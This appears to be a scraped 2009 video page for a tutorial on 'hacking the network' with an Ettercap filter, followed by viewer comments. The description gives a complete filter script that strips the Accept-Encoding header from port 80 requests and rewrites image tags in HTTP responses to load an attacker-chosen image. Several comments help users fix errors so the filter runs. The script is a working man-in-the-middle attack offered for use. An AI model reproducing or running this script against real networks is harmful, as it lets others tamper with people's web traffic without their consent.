Network Hijacking with Ettercap script

Loading...

Sign in or sign up now!
Alert icon
Upgrade to the latest Flash Player for improved playback performance. Upgrade now or more info.
12,988
Loading...
Alert icon
Sign in or sign up now!
Alert icon

Uploaded by on Nov 12, 2009

This is a tutorial showing you how to use ettercap script to hack the network.
Thanks to Ronsoft Tutorials

Script: ron.filter
=============
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=\"http://www.Any-site.com/your-image.png\" ");
replace("IMG SRC=", "img src=\"http://www.Any-site.com/your-image.png\" ");
msg("Filter Ran.\n");
}

REFERENCES:

ip.proto:
http://www.networksorcery.com/enp/protocol/ip.htm

Encoding:
http://en.wikipedia.org/wiki/Character_encodings_in_HTML

  • likes, 5 dislikes

Link to this comment:

Share to:

Uploader Comments (Ronnieflip)

  • hi

    I get this error when launching a website,

    The replace seems to throw the following error for each image found

    JIT FILTER FAULT: Cannot modify packets in unoffensive mode

    JIT FILTER FAULT: Cannot modify packets in unoffensive mode

    JIT FILTER FAULT: Cannot modify packets in unoffensive mode

    Any ideas as to unoffensive mode???

  • @jeromesheerin1982 : Hey try switch to the promisc mode under the options tab.

  • Ronnieflip I copied your script and when I type etterfilter ron.filter -o ron.ef

    I get the message

    [ron.filter:1]: Constant "S" not recognized

    Any idea of how to fix this??

    Thanks for the vid by the way.

  • @LankAsif : I think you should recheck your script. Looks like a the "s" char got in unnoticed!

see all

All Comments (42)

Sign In or Sign Up now to post a comment!
  • CimpianAlin no its not fake this script is also posted in the irongeek website he explains this in detail and i know kus of personal experience :)

  • are u on speed or somting fuuuuck calm down man i literaly cant understand you

  • it`s fake is connected with remote conection also VNC :)))) no ettercap

  • nice tutorial

  • you have backtrack for dummies , u dont know wat are u doin XD

  • Ooo God ! I like the that you're talking ! why are you so excited ? by the way , it was my first filter script tutorials, looks like not so difficult as i though at all ! thanks :)

  • 7:55

  • @Apolakkiatis : No problem..... i be glad if i can help.

Loading...

Alert icon
0 / 00Unsaved Playlist Return to active list
    1. Your queue is empty. Add videos to your queue using this button:
      or sign in to load a different list.
    Loading...Loading...Saving...
    • Clear all videos from this list
    • Learn more